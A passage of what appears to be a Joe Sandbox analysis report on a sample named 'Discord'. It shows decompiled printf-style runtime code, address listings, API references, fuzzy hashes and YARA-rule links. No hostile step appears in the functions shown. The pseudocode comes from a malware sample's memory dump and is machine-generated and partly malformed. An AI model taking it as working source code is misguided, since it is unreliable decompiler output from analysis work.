									__esp[0xe] = __esp[0xe] | 0x00000004;
									__edx =  *(__esi + 1) & 0x000000ff;
									__esi = __edi;
									__esp[4] = 4;
									goto L7;
								case 0x11:
									L92:
									__ebx =  *__ebp;
									__eax = L"(null)";
									__esi = __ebp + 4;
									__ebp = __esi;
									__eflags = __ebx;
									__ebx =  ==  ? L"(null)" : __ebx;
									__eax = wcslen(__ebx);
									__ecx =  &(__esp[0xd]);
									__edx = __eax;
									__eax = __ebx;
									__eax = E6DE8EDD0(__ebx,  &(__esp[0xd]), __edx, __eflags);
									goto L1;
								case 0x12:
									__eflags = __esp[5] - 3;
									if(__esp[5] == 3) {
										__ecx =  *__ebp;
										__ebp = __ebp + 8;
										__ebx =  *(__ebp - 4);
										__esp[0xa] = __ecx;
										__esp[0xb] =  *(__ebp - 4);
									} else {
										__eflags = __esp[5] - 2;
										if(__esp[5] == 2) {
											__esi =  *__ebp;
											__ebp = __ebp + 4;
											__esp[0xb] = 0;
											__esp[0xa] = __esi;
										} else {
											__esi =  *__ebp;
											__edx = __ebp + 4;
											__eflags = __esp[5] - 1;
											__esp[0xb] = 0;
											__esp[0xa] = __esi;
											if(__esp[5] == 1) {
												__ecx = __esp[0xa] & 0x0000ffff;
												__ebp = __edx;
												__esp[0xb] = 0;
												__esp[0xa] = __esp[0xa] & 0x0000ffff;
											} else {
												__eflags = __esp[5] - 4;
												__ebp = __edx;
												if(__esp[5] == 4) {
													__edx = __esp[0xa] & 0x000000ff;
													__esp[0xb] = 0;
													__esp[0xa] = __esp[0xa] & 0x000000ff;
												}
											}
										}
									}
									__eflags = __eax - 0x75;
									if(__eax == 0x75) {
										goto L25;
									} else {
										__edx = __esp[0xa];
										__esi =  &(__esp[0xd]);
										__ecx = __esp[0xb];
										__eax = E6DE8F2B0(__eax, __esp[0xb], __edx, __esi);
										goto L1;
									}
								case 0x13:
									__esp[0xe] = __esp[0xe] | 0x00000020;
									__eflags = __al & 0x00000004;
									__esp[0xe] = __esp[0xe] | 0x00000020;
									if((__al & 0x00000004) == 0) {
										L68:
										__ebx = __ebp + 8;
										[tword [esp] =  *__ebp;
										__ebp = __ebp + 8;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FD70( &(__esp[0xd]));
										goto L1;
									}
									L18:
									__ebx = __ebp + 0xc;
									[tword [esp] = [tword [ebp];
									__ebp = __ebp + 0xc;
									__eax =  &(__esp[0xd]);
									__eax = E6DE8FD70( &(__esp[0xd]));
									goto L1;
								case 0x14:
									__edx = __esp[5];
									__eax = __ebp;
									__esp[0x10] = 0xffffffff;
									__edx = __esp[5] - 2;
									__eflags = __esp[5] - 2 - 1;
									if(__eflags <= 0) {
										L84:
										__eax =  *__ebp;
										__ebx = __ebp + 4;
										__edx = 1;
										__ecx =  &(__esp[0xd]);
										__ebp = __ebp + 4;
										__esp[0xa] = __ax;
										__eax =  &(__esp[0xa]);
										__eax = E6DE8EDD0( &(__esp[0xa]),  &(__esp[0xd]), 1, __eflags);
									} else {
										__eax =  *__eax;
										__ecx =  &(__esp[0xd]);
										__edx = 1;
										__ebp = __ebp + 4;
										__esp[0xa] = __al;
										__eax =  &(__esp[0xa]);
										__eax = E6DE8EEC0( &(__esp[0xa]),  &(__esp[0xd]), 1);
									}
									goto L1;
								case 0x15:
									__esp[0xe] = __esp[0xe] | 0x00000080;
									__eflags = __esp[5] - 3;
									if(__esp[5] == 3) {
										__eax =  *__ebp;
										__ebp = __ebp + 8;
										__edx =  *(__ebp - 4);
										__esp[0xa] = __eax;
										__esp[0xb] =  *(__ebp - 4);
									} else {
										__eflags = __esp[5] - 2;
										if(__esp[5] == 2) {
											__eax =  *__ebp;
											__ebp = __ebp + 4;
											__esp[0xa] = __eax;
											__esp[0xb] = __eax;
										} else {
											__eax =  *__ebp;
											__edx = __ebp + 4;
											__esp[0xa] = __eax;
											__eax = __eax >> 0x1f;
											__eflags = __esp[5] - 1;
											__esp[0xb] = __eax;
											if(__esp[5] == 1) {
												__eax = __esp[0xa];
												__ebp = __edx;
												__esp[0xa] = __eax;
												__esp[0xb] = __eax;
											} else {
												__eflags = __esp[5] - 4;
												__ebp = __edx;
												if(__esp[5] == 4) {
													__eax = __esp[0xa];
													__esp[0xa] = __eax;
													__esp[0xb] = __eax;
												}
											}
										}
									}
									L25:
									__eax = __esp[0xa];
									__ecx =  &(__esp[0xd]);
									__edx = __esp[0xb];
									__eax = E6DE8EFF0(__esp[0xa],  &(__esp[0xd]), __edx);
									goto L1;
								case 0x16:
									__esp[0xe] = __esp[0xe] | 0x00000020;
									__eflags = __al & 0x00000004;
									__esp[0xe] = __esp[0xe] | 0x00000020;
									if((__al & 0x00000004) == 0) {
										L82:
										__ebx = __ebp + 8;
										[tword [esp] =  *__ebp;
										__ebp = __ebp + 8;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FA60( &(__esp[0xd]));
										goto L1;
									}
									L20:
									__ebx = __ebp + 0xc;
									[tword [esp] = [tword [ebp];
									__ebp = __ebp + 0xc;
									__eax =  &(__esp[0xd]);
									__eax = E6DE8FA60( &(__esp[0xd]));
									goto L1;
								case 0x17:
									__esp[0xe] = __esp[0xe] | 0x00000020;
									__eflags = __al & 0x00000004;
									__esp[0xe] = __esp[0xe] | 0x00000020;
									if((__al & 0x00000004) == 0) {
										L86:
										__ebx = __ebp + 8;
										[tword [esp] =  *__ebp;
										__ebp = __ebp + 8;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FB10( &(__esp[0xd]));
										goto L1;
									}
									L51:
									__ebx = __ebp + 0xc;
									[tword [esp] = [tword [ebp];
									__ebp = __ebp + 0xc;
									__eax =  &(__esp[0xd]);
									__eax = E6DE8FB10( &(__esp[0xd]));
									goto L1;
								case 0x18:
									__esp[0xe] = __esp[0xe] | 0x00000020;
									__eflags = __al & 0x00000004;
									__esp[0xe] = __esp[0xe] | 0x00000020;
									if((__al & 0x00000004) == 0) {
										L57:
										__ebx = __ebp + 8;
										[tword [esp] =  *__ebp;
										__ebp = __ebp + 8;
										__eax =  &(__esp[0xd]);
										__eax = E6DE8FBF0( &(__esp[0xd]));
										goto L1;
									}
									L49:
									__ebx = __ebp + 0xc;
									[tword [esp] = [tword [ebp];
									__ebp = __ebp + 0xc;
									__eax =  &(__esp[0xd]);
									__eax = E6DE8FBF0( &(__esp[0xd]));
									goto L1;
								case 0x19:
									__edx =  *(__esi + 1) & 0x000000ff;
									__eflags = __dl - 0x68;
									if(__eflags == 0) {
										__edi = __esi + 2;
										__edx =  *(__esi + 2) & 0x000000ff;
										__esp[5] = 4;
										__esi = __edi;
										__esp[4] = 4;
									} else {
										__esp[5] = 1;
										__esi = __edi;
										__esp[4] = 4;
									}
									goto L7;
								case 0x1a:
									__edx =  *(__esi + 1) & 0x000000ff;
									__esi = __edi;
									__esp[5] = 3;
									__esp[4] = 4;
									goto L7;
								case 0x1b:
									__edx =  *(__esi + 1) & 0x000000ff;
									__eflags = __dl - 0x6c;
									if(__eflags == 0) {
										__edi = __esi + 2;
										__edx =  *(__esi + 2) & 0x000000ff;
										__esp[5] = 3;
										__esi = __edi;
										__esp[4] = 4;
										goto L7;
									}
									L55:
									__esp[5] = 2;
									__esi = __edi;
									__esp[4] = 4;
									goto L7;
								case 0x1c:
									goto L52;
								case 0x1d:
									__eflags = __esp[5] - 4;
									if(__eflags == 0) {
										__edx =  *__ebp;
										__ebp = __ebp + 4;
										__eax = __esp[0x15];
										 *__edx = __al;
									} else {
										__eflags = __esp[5] - 1;
										__eax =  *__ebp;
										__edx = __esp[0x15];
										if(__eflags == 0) {
											 *__eax = __dx;
											__ebp = __ebp + 4;
										} else {
											__eflags = __esp[5] - 2;
											if(__eflags == 0) {
												 *__eax = __edx;
												__ebp = __ebp + 4;
											} else {
												__eflags = __esp[5] - 3;
												 *__eax = __edx;
												if(__eflags == 0) {
													__esi = __edx;
													__ebp = __ebp + 4;
													__esi = __edx >> 0x1f;
													 *(__eax + 4) = __esi;
												} else {
													__ebp = __ebp + 4;
												}
											}
										}
									}
									goto L1;
								case 0x1e:
									__ebx = __esp[4];
									__eflags = __esp[4];
									if(__esp[4] == 0) {
										__eax = __esp[0x20];
										__eflags = __esp[0xe] - __eax;
										if(__esp[0xe] == __eax) {
											__ah = __ah | 0x00000002;
											__esp[0xe] = __eax;
											__esp[0x10] = 8;
										}
									}
									__eax =  *__ebp;
									__ebx = __ebp + 4;
									__esp[0xb] = 0;
									__ecx = __esp[0xb];
									__ebp = __ebp + 4;
									__esp[0xa] = __eax;
									__edx = __esp[0xa];
									__eax =  &(__esp[0xd]);
									 *__esp =  &(__esp[0xd]);
									__eax = 0x78;
									__eax = E6DE8F2B0(0x78, __esp[0xb], __edx);
									goto L1;
								case 0x1f:
									__edx = __esp[5];
									__eax = __ebp;
									__edx = __esp[5] - 2;
									__eflags = __esp[5] - 2 - 1;
									if(__esp[5] - 2 <= 1) {
										goto L92;
									}
									__ebx =  *__eax;
									__ebp = __ebp + 4;
									__eflags = __ebx;
									if(__ebx == 0) {
										goto L53;
									}
									goto L13;
								case 0x20:
									_t273 =  *(_t284 + 1) & 0x000000ff;
									_t284 = _t283;
									 *(_t287 + 0x14) = 2;
									 *(_t287 + 0x10) = 4;
									goto L7;
							}
							L7:
						} while (_t273 != 0);
						goto L8;
					}
					return  *((intOrPtr*)(_t287 + 0x54));
					L13:
					__edx = strlen(__ebx);
					goto L14;
				}
			}

0x6de9070c
0x6de90710
0x6de90710
0x6de90710
0x6de90717
0x6de9071c
0x6de9071e
0x6de90720
0x00000000
0x00000000
0x6de90726
0x6de90726
0x6de9072b
0x6de9041b
0x6de9041b
0x6de9041f
0x6de90421
0x6de90333
0x6de90333
0x6de90333
0x6de90336
0x6de90339
0x6de9033d
0x00000000
0x00000000
0x00000000
0x6de90343
0x6de90346
0x6de903e6
0x6de903e8
0x00000000
0x00000000
0x00000000
0x00000000
0x6de9034c
0x6de90353
0x6de9035b
0x6de90363
0x6de9036b
0x6de9036f
0x6de90377
0x6de9037b
0x6de90385
0x6de903c4
0x6de903c4
0x6de903c6
0x6de903c9
0x6de903cc
0x6de903d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90387
0x6de90387
0x6de90387
0x6de9038a
0x6de90390
0x6de90393
0x6de90831
0x6de90831
0x6de90835
0x6de90838
0x6de90c5b
0x6de90c64
0x6de90c66
0x00000000
0x6de90c66
0x6de90841
0x6de90844
0x00000000
0x00000000
0x6de9084a
0x6de9084c
0x6de909c0
0x6de909c8
0x6de909cb
0x6de90852
0x6de90852
0x6de90852
0x6de9085e
0x6de90860
0x6de907ef
0x6de907ef
0x00000000
0x6de90862
0x6de90862
0x6de90866
0x6de90868
0x6de9086a
0x6de90b1c
0x6de90b1e
0x6de90b22
0x6de90870
0x6de9087b
0x6de9087d
0x6de907f3
0x6de907f3
0x6de907f3
0x00000000
0x6de9086a
0x6de90860
0x6de9039c
0x00000000
0x6de90960
0x6de90964
0x6de90966
0x00000000
0x00000000
0x6de9096c
0x6de90971
0x6de90975
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90940
0x6de90944
0x6de90946
0x00000000
0x00000000
0x6de9094c
0x6de90954
0x6de90958
0x00000000
0x00000000
0x6de90980
0x6de90984
0x00000000
0x00000000
0x6de907e3
0x6de907e7
0x6de907e9
0x6de90a02
0x6de90a0a
0x6de90a12
0x6de90a17
0x6de90a1b
0x6de90a1f
0x6de90a2a
0x6de90a2e
0x6de90a32
0x6de90a35
0x6de90a3a
0x6de90a3c
0x6de90a3e
0x6de90a43
0x6de90a43
0x6de90a48
0x6de90a4c
0x6de90a50
0x00000000
0x6de90a50
0x00000000
0x00000000
0x6de907a0
0x6de907a4
0x6de907a6
0x00000000
0x00000000
0x6de907ac
0x6de907b4
0x6de909e7
0x6de909eb
0x6de909ed
0x6de909f5
0x00000000
0x6de909f5
0x6de907ba
0x6de907bd
0x6de907c0
0x6de907c4
0x6de907c6
0x6de907c8
0x6de90bcc
0x6de90bd0
0x6de90bd2
0x6de90c3e
0x6de90c46
0x6de90c48
0x6de90c4c
0x6de90c54
0x00000000
0x6de90c54
0x6de90bd4
0x6de90bdc
0x6de90bdc
0x6de907ce
0x6de907d2
0x6de907d4
0x6de907d6
0x00000000
0x00000000
0x6de90785
0x6de90789
0x6de9078b
0x00000000
0x6de9078d
0x6de9078d
0x6de90795
0x6de90799
0x00000000
0x6de90799
0x00000000
0x6de908a4
0x6de908a8
0x6de908aa
0x00000000
0x00000000
0x6de908b0
0x6de908b8
0x6de908bc
0x00000000
0x00000000
0x6de90886
0x6de9088b
0x6de90af6
0x6de90afa
0x6de90b02
0x6de90b06
0x6de90b08
0x6de90b0c
0x00000000
0x6de90b0c
0x6de90891
0x6de90891
0x6de90895
0x6de90897
0x00000000
0x00000000
0x6de90825
0x6de90829
0x6de9082b
0x6de909d4
0x6de909dc
0x6de909e0
0x00000000
0x6de909e0
0x00000000
0x00000000
0x6de90800
0x6de90804
0x6de90806
0x00000000
0x00000000
0x00000000
0x00000000
0x6de908e8
0x00000000
0x00000000
0x6de908c3
0x6de908c7
0x6de908c9
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90914
0x6de90918
0x6de9091a
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90760
0x6de90764
0x6de90766
0x00000000
0x00000000
0x00000000
0x00000000
0x6de905a8
0x6de905ac
0x6de905af
0x6de90ad0
0x6de90ad4
0x6de90c20
0x6de90c23
0x6de90c27
0x6de90c2f
0x6de90c31
0x6de90ada
0x6de90ada
0x6de90adf
0x6de90ae1
0x6de90ae9
0x6de90ae9
0x00000000
0x6de90ad4
0x6de905b5
0x6de905b8
0x00000000
0x6de905be
0x6de905be
0x6de905c2
0x6de90b75
0x6de90b78
0x6de90b7c
0x6de90b84
0x6de90b86
0x6de905c8
0x6de905c8
0x6de905cd
0x6de905cf
0x6de905d7
0x6de905d7
0x00000000
0x6de905c2
0x00000000
0x6de90590
0x6de90595
0x6de90599
0x6de9059b
0x00000000
0x00000000
0x6de90990
0x6de90990
0x6de90993
0x6de90998
0x6de9099b
0x6de9099d
0x6de9099f
0x6de909a5
0x6de909aa
0x6de909ae
0x6de909b0
0x6de909b2
0x00000000
0x00000000
0x6de90530
0x6de90535
0x6de90aba
0x6de90abd
0x6de90ac0
0x6de90ac3
0x6de90ac7
0x6de9053b
0x6de9053b
0x6de90540
0x6de90b29
0x6de90b2c
0x6de90b2f
0x6de90b37
0x6de90546
0x6de90546
0x6de90549
0x6de9054c
0x6de90551
0x6de90559
0x6de9055d
0x6de90bb4
0x6de90bb9
0x6de90bbb
0x6de90bc3
0x6de90563
0x6de90563
0x6de90568
0x6de9056a
0x6de90c0a
0x6de90c0f
0x6de90c17
0x6de90c17
0x6de9056a
0x6de9055d
0x6de90540
0x6de90570
0x6de90573
0x00000000
0x6de90575
0x6de90575
0x6de90579
0x6de9057d
0x6de90584
0x00000000
0x6de90584
0x00000000
0x6de90474
0x6de90477
0x6de90479
0x6de9047d
0x6de9080c
0x6de9080f
0x6de90812
0x6de90815
0x6de90817
0x6de9081b
0x00000000
0x6de9081b
0x6de90483
0x6de90486
0x6de90489
0x6de9048c
0x6de9048e
0x6de90492
0x00000000
0x00000000
0x6de90430
0x6de90434
0x6de90436
0x6de9043e
0x6de90441
0x6de90444
0x6de908f0
0x6de908f0
0x6de908f3
0x6de908f6
0x6de908fb
0x6de908ff
0x6de90901
0x6de90906
0x6de9090a
0x6de9044a
0x6de9044a
0x6de9044c
0x6de90450
0x6de90455
0x6de90458
0x6de9045c
0x6de90460
0x6de90460
0x00000000
0x00000000
0x6de904d0
0x6de904d8
0x6de904dd
0x6de90a86
0x6de90a89
0x6de90a8c
0x6de90a8f
0x6de90a93
0x6de904e3
0x6de904e3
0x6de904e8
0x6de90b4b
0x6de90b4e
0x6de90b51
0x6de90b58
0x6de904ee
0x6de904ee
0x6de904f1
0x6de904f4
0x6de904f8
0x6de904fb
0x6de90500
0x6de90504
0x6de90b9d
0x6de90ba2
0x6de90ba4
0x6de90bab
0x6de9050a
0x6de9050a
0x6de9050f
0x6de90511
0x6de90bf5
0x6de90bfa
0x6de90c01
0x6de90c01
0x6de90511
0x6de90504
0x6de904e8
0x6de90517
0x6de90517
0x6de9051b
0x6de9051f
0x6de90523
0x00000000
0x00000000
0x6de904a4
0x6de904a7
0x6de904a9
0x6de904ad
0x6de908cf
0x6de908d2
0x6de908d5
0x6de908d8
0x6de908da
0x6de908de
0x00000000
0x6de908de
0x6de904b3
0x6de904b6
0x6de904b9
0x6de904bc
0x6de904be
0x6de904c2
0x00000000
0x00000000
0x6de906e4
0x6de906e7
0x6de906e9
0x6de906ed
0x6de90920
0x6de90923
0x6de90926
0x6de90929
0x6de9092b
0x6de9092f
0x00000000
0x6de9092f
0x6de906f3
0x6de906f6
0x6de906f9
0x6de906fc
0x6de906fe
0x6de90702
0x00000000
0x00000000
0x6de906b8
0x6de906bb
0x6de906bd
0x6de906c1
0x6de9076c
0x6de9076f
0x6de90772
0x6de90775
0x6de90777
0x6de9077b
0x00000000
0x6de9077b
0x6de906c7
0x6de906ca
0x6de906cd
0x6de906d0
0x6de906d2
0x6de906d6
0x00000000
0x00000000
0x6de90690
0x6de90694
0x6de90697
0x6de90a9c
0x6de90a9f
0x6de90aa3
0x6de90aab
0x6de90aad
0x6de9069d
0x6de9069d
0x6de906a5
0x6de906a7
0x6de906a7
0x00000000
0x00000000
0x6de90670
0x6de90674
0x6de90676
0x6de9067e
0x00000000
0x00000000
0x6de90735
0x6de90739
0x6de9073c
0x6de90a68
0x6de90a6b
0x6de90a6f
0x6de90a77
0x6de90a79
0x00000000
0x6de90a79
0x6de90742
0x6de90742
0x6de9074a
0x6de9074c
0x00000000
0x00000000
0x00000000
0x00000000
0x6de90630
0x6de90635
0x6de90a57
0x6de90a5a
0x6de90a5d
0x6de90a61
0x6de9063b
0x6de9063b
0x6de90640
0x6de90643
0x6de90647
0x6de90b40
0x6de90b43
0x6de9064d
0x6de9064d
0x6de90652
0x6de90b93
0x6de90b95
0x6de90658
0x6de90658
0x6de9065d
0x6de9065f
0x6de90be5
0x6de90be7
0x6de90bea
0x6de90bed
0x6de90665
0x6de90665
0x6de90665
0x6de9065f
0x6de90652
0x6de90647
0x00000000
0x00000000
0x6de905e4
0x6de905e8
0x6de905ea
0x6de905ec
0x6de905f3
0x6de905f7
0x6de90b61
0x6de90b64
0x6de90b68
0x6de90b68
0x6de905f7
0x6de905fd
0x6de90600
0x6de90603
0x6de9060b
0x6de9060f
0x6de90611
0x6de90615
0x6de90619
0x6de9061d
0x6de90620
0x6de90625
0x00000000
0x00000000
0x6de903f2
0x6de903f6
0x6de903f8
0x6de903fb
0x6de903fe
0x00000000
0x00000000
0x6de90404
0x6de90406
0x6de90409
0x6de9040b
0x00000000
0x00000000
0x00000000
0x00000000
0x6de903a3
0x6de903a7
0x6de903a9
0x6de903b1
0x00000000
0x00000000
0x6de903c0
0x6de903c0
0x00000000
0x6de90387
0x6de903e1
0x6de90411
0x6de90419
0x00000000
0x6de90419

APIs

strlen.MSVCRT ref: 6DE90414
strerror.MSVCRT ref: 6DE90717

Strings

(null), xrefs: 6DE9072B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: strerrorstrlen
String ID: (null)
API String ID: 960536887-3941151225
Opcode ID: b6e651917216d505d394986de03532ae1637bbc673d7405e422f99090c5797bb
Instruction ID: 6bac535d3a9501d39f604e7c3c78728b7c920c880460a99df882086f220472ff
Opcode Fuzzy Hash: b6e651917216d505d394986de03532ae1637bbc673d7405e422f99090c5797bb
Instruction Fuzzy Hash: A7115B7020A7528FC760CF25C4D036BB7E2BF45314FA04A2DE9A09B381EB75E509CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004019C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401A10

Strings

Unknown error, xrefs: 004019CC
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004019F9

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 0075688f390a7307846a906b5c498165ccc9b00ed1ccbc287f235fedd576cd2c
Instruction ID: ee99a9c6d9571393e57abae1ff02d30f5de943c105bb7453f7042e5014bd1fcf
Opcode Fuzzy Hash: 0075688f390a7307846a906b5c498165ccc9b00ed1ccbc287f235fedd576cd2c
Instruction Fuzzy Hash: 2EF0B7B0504642CBC304EF15D58881ABBF0FFC4344F9689ADE5C4AB365D739D8A8CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 6DE92960 Relevance: 5.1, APIs: 4, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 6DE9298B
InitializeCriticalSection.KERNEL32 ref: 6DE929C3
InitializeCriticalSection.KERNEL32 ref: 6DE929CF
EnterCriticalSection.KERNEL32 ref: 6DE929F7

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 7f027558f838396fb2d80cd7547135f85e3f6f63f58693bcfdb1aab7ddc33bb7
Instruction ID: 185677df435bf61a386216acafb5b3f4d0988fb4ac53ba259802565354a0fa33
Opcode Fuzzy Hash: 7f027558f838396fb2d80cd7547135f85e3f6f63f58693bcfdb1aab7ddc33bb7
Instruction Fuzzy Hash: BF11E3705162018BDF20AB68D4863AE77F5FB62314F604027E4495F304DB34E0A8C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00402160 Relevance: 5.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00402187
free.MSVCRT ref: 004021D1
LeaveCriticalSection.KERNEL32 ref: 004021DD

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 97200012013efa0124e94fd990170a2bb83aa239e1daf90100fa6c78dac3ffd4
Instruction ID: f4374446f5954c4ef90a63e910c0fa71ed1892e4fa806ebd9e156b32d2e913c4
Opcode Fuzzy Hash: 97200012013efa0124e94fd990170a2bb83aa239e1daf90100fa6c78dac3ffd4
Instruction Fuzzy Hash: 8F013C70714201CFC700EF68DA8851ABBF0BB44304B155579E946AB3D1DB78E994CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8E710 Relevance: 5.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6DE8E737
free.MSVCRT ref: 6DE8E781
LeaveCriticalSection.KERNEL32 ref: 6DE8E78D

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: ba27257e9af32864e4f9b20c8e3904f01237d593bec07f5edf6c13f0ee6a65e9
Instruction ID: a5115a3e156ec675f323aefd8ba7dc960125ec23360b699eabe55086a17db84f
Opcode Fuzzy Hash: ba27257e9af32864e4f9b20c8e3904f01237d593bec07f5edf6c13f0ee6a65e9
Instruction Fuzzy Hash: D0011E74B056068FD700EF6DC58952DBBF1BB46B48B284968D949DB302EB32D844CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00402050 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00402060
TlsGetValue.KERNEL32 ref: 00402085
GetLastError.KERNEL32 ref: 00402090
LeaveCriticalSection.KERNEL32 ref: 004020B0

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 9b12fd750eaf287294bfe240e8fb41e7593a235fa958c79c337acbf3ab83cf9b
Instruction ID: 51617e4ba1e615c93f184f8a589c6a6287270d1f74e9b678fcb0be3a3016468b
Opcode Fuzzy Hash: 9b12fd750eaf287294bfe240e8fb41e7593a235fa958c79c337acbf3ab83cf9b
Instruction Fuzzy Hash: 0DF081769047009FC710BFA99A4865BBBB4FB84320F010439ED95A3380D778B828CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8E600 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6DE8E610
TlsGetValue.KERNEL32 ref: 6DE8E635
GetLastError.KERNEL32 ref: 6DE8E640
LeaveCriticalSection.KERNEL32 ref: 6DE8E660

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
